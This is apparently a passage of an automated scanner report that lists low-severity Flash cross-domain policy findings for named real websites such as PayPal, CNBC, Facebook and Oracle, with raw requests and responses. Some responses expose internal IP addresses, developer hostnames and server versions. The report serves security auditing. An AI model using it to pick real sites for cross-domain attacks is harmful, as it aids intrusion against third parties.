Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Tue, 06 Sep 2011 17:05:55 GMT
Expires: Wed, 07 Sep 2011 17:05:55 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.79. http://assets1.csc.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://assets1.csc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: assets1.csc.com

Response

HTTP/1.0 200 OK
x-amz-id-2: FcnyXqPak36cLwKPUi1HA56iJfWYFNUtUM95uLnVRd/JmKoOs3CeXukpfMrEdpbc
x-amz-request-id: 9A44AC709A32B889
Date: Tue, 06 Sep 2011 15:57:47 GMT
Last-Modified: Thu, 03 Jun 2010 19:56:13 GMT
ETag: "31616154d66e52c8a5f79d34e7fa229a"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 256
Server: AmazonS3
X-Cache: Miss from cloudfront
X-Amz-Cf-Id: ee9cad8e5f3b5b709b20cb0f6ea0020c8921721e47f4c95b539bdba55cfb09358c2ee8f9cae47b93,41028218a4b1860c2975b885931132835d738f7494f9734ced53465bad11a658a47fd29a3b9917d4
Via: 1.0 db26aad8eddbf74ac3abe77abd5de63f.cloudfront.net:11180 (CloudFront), 1.0 23d5f9ecd89e26f0c254accbbb676a22.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.csc.com" />
<allow-access-
...[SNIP]...

4.80. http://blogs.oracle.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://blogs.oracle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: blogs.oracle.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Last-Modified: Sat, 16 Jul 2011 10:06:38 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=214587153+0;age=2083326;ecid=51608497101082732,0:1)
Content-Length: 392
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:12:52 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-onl
...[SNIP]...
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.sun.com"/>
...[SNIP]...

4.81. http://bstats.adbrite.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: bstats.adbrite.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Content-Length: 398
Server: XPEHb/1.0
Accept-Ranges: none
Date: Tue, 06 Sep 2011 15:32:13 GMT

<?xml version="1.0" encoding="UTF-8"?>
<!-- AdBrite crossdomain.xml for BritePic and BriteFlic -->
<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...

4.82. http://channelsun.sun.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://channelsun.sun.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: channelsun.sun.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/2.5
Server: Sun GlassFish Enterprise Server v2.1
ETag: W/"872-1302718369000"
Last-Modified: Wed, 13 Apr 2011 18:12:49 GMT
Content-Type: application/xml
Content-Length: 872
Date: Tue, 06 Sep 2011 16:13:10 GMT

<cross-domain-policy>
<allow-access-from domain="*.oracle.com"/>
<allow-access-from domain="oracle.com"/>
<allow-access-from domain="www.oracle.com"/>
<allow-access-from domain="presenter.oracle.com"/>
<allow-access-from domain="streaming.oracle.com"/>
<allow-access-from domain="web148.oracle.com"/>
<allow-access-from domain="http://72.47.210.156"/>
<allow-access-from domain="http://216.70.88.224"/>
<allow-access-from domain="events-mktas.oracle.com"/>
<allow-access-from domain="events-mktap.oracle.com"/>
<allow-access-from domain="eventreg.oracle.com"/>
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="admin.brightcove.com"/>
<allow-access-from domain="www.oracleimg.com"/>
<allow-access-from domain="medianetwork.oracle.com"/>
<allow-access-from domain="*.akamai.com"/>
<allow-access-from domain="*.omniture.com"/>
...[SNIP]...

4.83. https://cms.paypal.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://cms.paypal.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cms.paypal.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 10 Jun 2008 20:10:41 GMT
Accept-Ranges: bytes
Content-Length: 312
Content-Type: application/xml
Expires: Tue, 06 Sep 2011 17:06:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 17:06:25 GMT
Connection: close
Set-Cookie: BIGipServerpool_cms.paypal.com_443=455494154.26702.0000; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.paypal.com" />
<allow-access-from domain="*.ebay.com" />
<allow-access-from domain="*.paypalobjects.com" />
...[SNIP]...

4.84. http://cnbc.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: cnbc.com
Proxy-Connection: keep-alive
Referer: http://media.cnbc.com/i/CNBC/Components/Promos/_app/promoBox_auto.swf?delay=0&config=24596694&v=7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; __qseg=Q_D; s_nr=1315339052241; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CBlog%25257CAllT%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/id/15837856/site/14081545/%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 31 May 2011 22:37:42 GMT
Accept-Ranges: bytes
ETag: "0ff4d5ae31fcc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Connection: Keep-Alive
Date: Tue, 06 Sep 2011 14:57:41 GMT
Age: 2384
Content-Length: 3839

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.atdmt.com"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.imwx.com" />
...[SNIP]...

4.85. http://cvs.shoplocal.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cvs.shoplocal.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cvs.shoplocal.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Fri, 12 Aug 2011 18:31:01 GMT
Accept-Ranges: bytes
ETag: "7b77bcfc1d59cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT"
Content-Length: 5330
Date: Tue, 06 Sep 2011 17:06:25 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.crossmediaservices.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.shoplocal.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.target.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.publix.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.homedepot.com" />
<allow-access-from domain="weeklyad.lowes.com" />
<allow-access-from domain="instorespecials.staples.com" />
<allow-access-from domain="weeklyad.staples.com" />
<allow-access-from domain="weeklyad.cvs.com" />
<allow-access-from domain="weeklyad.circuitcity.com" />
<allow-access-from domain="www.jcpstoreads.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="192.168.0.251" />
<allow-access-from domain="10.200.1.53" />
<allow-access-from domain="10.200.1.59" />
<allow-access-from domain="10.200.1.61" />
<allow-access-from domain="v-devweb1" />
<allow-access-from domain="d-pshahrava" />
<allow-access-from domain="192.168.0.9" />
<allow-access-from domain="192.168.0.10" />
<allow-access-from domain="192.168.0.111" />
<allow-access-from domain="192.168.0.36" />
<allow-access-from domain="172.16.200.22" />
<allow-access-from domain="172.16.200.23" />
<allow-access-from domain="d-dmoore2" />
<allow-access-from domain="vqascweb1" />
<allow-access-from domain="vqascweb2" />
<allow-access-from domain="localhost" />
<allow-access-from domain="devweb1" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.pointroll.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.pointroll.com" secure="true" />
...[SNIP]...
<allow-access-from domain="data.pointroll.com" secure="true" />
...[SNIP]...
<allow-access-from domain="speed.pointroll.com" secure="true" />
...[SNIP]...
<allow-access-from domain="mirror.pointroll.com" secure="true" />
...[SNIP]...
<allow-access-from domain="geo.pointroll.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="ad.doubleclick.net" />
<allow-access-from domain="m.doubleclick.net" />
<allow-access-from domain="m2.doubleclick.net" />
<allow-access-from domain="m3.doubleclick.net" />
<allow-access-from domain="m.2mdn.net" />
<allow-access-from domain="m1.2mdn.net" />
<allow-access-from domain="m2.2mdn.net" />
<allow-access-from domain="creatives.doubleclick.net" />
<allow-access-from domain="motifcdn2.doubleclick.net" />
<allow-access-from domain="motifcdn.doubleclick.net" />
<allow-access-from domain="*.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="dfa.doubleclick.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.atdmt.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.ippixel.com" />
<allow-access-from domain="www.wearepixel.com" />
<allow-access-from domain="www.yourlexusdealer.com" />
<allow-access-from domain="yourlexusdealer.com" />
<allow-access-from domain="devcpd1.yourlexusdealer.com" />
<allow-access-from domain="staging.yourlexusdealer.com" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="zshalla.desktop.amazon.com" />
<allow-access-from domain="snowbank.amazon.com" />
<allow-access-from domain="weeklyad.amazon.com" />
<allow-access-from domain="d-trobertson" secure="false"/>
...[SNIP]...
<allow-access-from domain="vmu-shd-fb1.sf.akqa.com"/>
<allow-access-from domain="tarjoukset.hs.fi" />
<allow-access-from domain="8.17.173.144" />
<allow-access-from domain="www.targetweeklyadapps.com" />
<allow-access-from domain="*.intellitxt.com" />
<allow-access-from domain="*.richrelevance.com" />
<allow-access-from domain="devcpd2.yourlexusdealer.com" />
<allow-access-from domain="dev.big5.adhostclient.com" />
<allow-access-from domain="big5sportinggoods.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.big5sportinggoods.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.sears.com" />
<allow-access-from domain="*.kmart.com" />
<allow-access-from domain="*.facebook.com" />
<allow-access-from domain="*.designkitchen.com" />
<allow-access-from domain="*.michaels.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.bonton.com" />
<allow-access-from domain="*.elder-beerman.com" />
<allow-access-from domain="*.carsons.com" />
<allow-access-from domain="*.bostonstore.com" />
<allow-access-from domain="*.younkers.com" />
<allow-access-from domain="*.parisian.com" />
<allow-access-from domain="*.herbergers.com" />
<allow-access-from domain="*.bergners.com" />
<allow-access-from domain="flyer.canadiantire.ca" />
<allow-access-from domain="circulaire.canadiantire.ca" />
<allow-access-from domain="cdn.uc.atwola.com" />
<allow-access-from domain="*.workalicious.com" />
<allow-access-from domain="*.liquidus.net" />
<allow-access-from domain="ec2-67-202-62-111.compute-1.amazonaws.com"/>
<allow-access-from domain="ec2-184-72-169-190.compute-1.amazonaws.com"/>
<allow-access-from domain="*.washingtonpost.com"/>
<allow-access-from domain="69.20.118.121" />
<allow-access-from domain="*.startribune.com" />
...[SNIP]...

4.86. http://data.cnbc.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://data.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: data.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:07 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 01 Apr 2009 19:06:33 GMT
ETag: "12a-46683038a8040"
Accept-Ranges: bytes
Content-Type: application/xml
Via: 1.1 aicache6
Content-Length: 298
X-Aicache-OS: 64.210.194.245:80
Connection: Keep-Alive
Keep-Alive: max=20

<?xml version="1.0"?>
<!-- http://stage.ticker.cnbc.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="www.cnbc.com" />
<allow-access-from domain="*.cnbc.com" />
<allow-access-from domain="www.msn.com" />
<allow-access-from domain="*.msn.com" />
...[SNIP]...

4.87. http://developers.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://developers.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: developers.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.136.154.104
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

4.88. http://disqus.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://disqus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: disqus.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:32 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
X-User: anon:608614822849
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Connection: close
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.usopen.org" to-ports="80,96" secure="false" />
...[SNIP]...

4.89. http://edge.sapient.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://edge.sapient.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: edge.sapient.com

Response

HTTP/1.0 200 OK
Content-Length: 588
Content-Type: text/xml
Last-Modified: Thu, 23 Apr 2009 19:45:38 GMT
Accept-Ranges: bytes
ETag: "5321c4134cc4c91:1edd"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=86400
Date: Tue, 06 Sep 2011 15:32:33 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"[]>
<cross-domain-policy>
<allow-access-from domain="*.sapient.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sapientem.com" secure="false" />
...[SNIP]...
<allow-access-from domain="sapient.com.edgesuite.net" secure="false" />
...[SNIP]...
<allow-access-from domain="edge-dev.sapient.com" secure="false" />
...[SNIP]...
<allow-access-from domain="localhost" secure="false" />
...[SNIP]...

4.90. http://event.on24.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://event.on24.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: event.on24.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:40 GMT
Server: Apache
Last-Modified: Sat, 18 Jun 2011 00:37:19 GMT
Accept-Ranges: bytes
Content-Length: 3138
Connection: close
Content-Type: application/xml; charset=utf-8

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="i.cmpnet.com" />
<allow-access-from domain="www.ttglive.com" />
<allow-access-from domain="www.ddj.com" />
<allow-access-from domain="building.co.uk" />
<allow-access-from domain="http.earthcache.net" />
...[SNIP]...
<allow-access-from domain="webcast.on24.com" />
<allow-access-from domain="*.on24.com" />
<allow-access-from domain="a659.g.akamai.net" />

<allow-access-from domain="wcc.webeventservices.com" />
   <allow-access-from domain="event.meetingstream.com" />
   <allow-access-from domain="event.ciscowebseminars.com" />
   <allow-access-from domain="webcast.premiereglobal.com" />
<allow-access-from domain="event.cisco-live.com" />
